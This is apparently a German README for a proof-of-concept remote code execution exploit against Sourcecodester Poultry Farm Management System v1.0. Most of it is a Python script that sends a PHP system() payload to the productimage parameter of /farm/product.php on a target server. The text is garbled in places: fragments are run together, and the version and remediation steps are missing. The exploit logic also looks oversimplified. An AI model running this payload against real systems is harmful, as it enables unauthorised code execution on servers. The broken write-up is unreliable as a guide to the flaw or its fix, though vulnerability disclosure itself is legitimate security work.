
Proof-of-Concept-Skript, das eine nicht authentifizierte Remote-Codeausführung im Sourcecodester Poultry Farm Management System über den anfälligen productimage-Parameter demonstriert.
Dieses Repository enthält ein Proof-of-Concept-Skript (PoC), das eine nicht authentifizierte Remote-Code-Ausführung (RCE) Sicherheitslücke in Sourcecodester Poultry Farm Management System v1.0 demonstriert. Die Sicherheitslücke existiert im Parameter productimage unter /farm/product.php, was es einem Angreifer ermöglicht, beliebigen Code auf dem Server auszuführen.
CVE-ID: (Ausstehend)
Überblick: Sourcecodester Poultry Farm Management System v1.0 enthält eine nicht authentifizierte Remote-Code-Ausführung (RCE) Sicherheitslücke über den Parameter unter . Diese Sicherheitslücke ermöglicht es einem Angreifer, ohne Authentifizierung beliebigen Code auf dem Server auszuführen.
productimage/farm/product.phpBetroffene Version:
requests-Bibliothek (pip install requests)Dieses Skript zeigt, wie ein Angreifer die RCE-Sicherheitslücke ausnutzen kann, indem er eine bösartige Anfrage an den anfälligen Parameter sendet.
Speichern Sie das folgende Skript als rce_poc.py und führen Sie es aus.
import requests
# Configuration
target_url = "http://target-url/farm/product.php" # Change this to the target URL
# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"
# Construct the malicious request
data = {
'productimage': payload # The vulnerable parameter
}
def exploit_rce(url, data):
"""
Exploit the RCE vulnerability by sending a malicious request to the target URL.
Args:
url (str): The target URL.
data (dict): The data to be sent in the POST request.
"""
try:
response = requests.post(url, data=data)
# Print the response details
print("Status Code:", response.status_code)
print("Response Body:", response.text)
if response.status_code == 200:
print("[+] Successfully executed the payload.")
else:
print("[-] Failed to execute the payload.")
except requests.RequestException as e:
print(f"[-] An error occurred: {e}")
if __name__ == "__main__":
print(f"Sending malicious request to: {target_url}")
exploit_rce(target_url, data)
target_url auf die URL des /farm/product.php-Endpunkts des anfälligen Servers.productimage.exploit_rce() sendet die bösartige Anfrage an die Ziel-URL und gibt die Antwortdetails aus.Um diese Sicherheitslücke zu beheben, wenden Sie die folgenden Schritte an:
Durch die Befolgung dieser Abhilfeschritte und Sicherheitsempfehlungen können Sie Sicherheitslücken wie dieses RCE-Problem in Sourcecodester Poultry Farm Management System v1.0 verhindern.